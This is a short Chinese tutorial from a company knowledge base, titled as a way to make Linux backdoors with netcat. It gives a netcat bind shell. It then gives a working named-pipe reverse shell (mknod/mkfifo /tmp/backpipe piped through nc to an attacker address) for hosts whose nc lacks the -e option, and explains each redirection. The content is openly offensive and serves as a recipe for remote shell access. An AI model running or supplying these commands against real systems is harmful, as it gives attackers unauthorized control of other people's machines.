NOVOTS KMS 词汇表 Glossary    联系我们 Contact Us
查询 Search  
   
按类别浏览 Browse by Category
NOVOTS KMS .: 操作系统 .: Unix/Linux .: Linux后门之道——NC用法

Linux后门之道——NC用法

对于瑞士军刀nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在渗透程中如果想反弹shell我们通常的做法是:

nc -l -vv -p 2222 -e /bin/bash

在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个
GAPING_SECURITY_HOLE常量),也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制,但这种情况下是不是就
没办法利用了呢?天无绝人之路,来看下面的TIP。

在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:

root@bt:~#mknod /tmp/backpipe p
root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe

第一条命令使用mknod在tmp目录下创建一个管道backpipe,第二条命令首先将默认shell环境的输入
重定向给刚才创建的管道,然后将输出通过nc attackerip
listenport重定向到攻击者一端,最后将shell的执行结果再重定向到管道中。

 网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道


这篇文章对你多有用?

相关文章

article Linux和Windows下ping命令详解
Ping是一种常见经常使用的命令,但是当你对网络环...

(No rating)  10-22-2012    Views: 1629   
article 利用diff和patch升级linux程序源代码
假设program-1.0目录中为老版,现开发完成的新版位...

  11-26-2009    Views: 2435   
article Linux ext4文件系统:性能和兼容性
  大多数主流Linux版本都配置了对完整 ext4...

(No rating)  1-9-2012    Views: 1389   

用户评语

添加评语
当前还没有评语.


.: .: .: .: .:
[ 登陆 ]
北京护航科技有限公司 2006

Novots Technologies Limited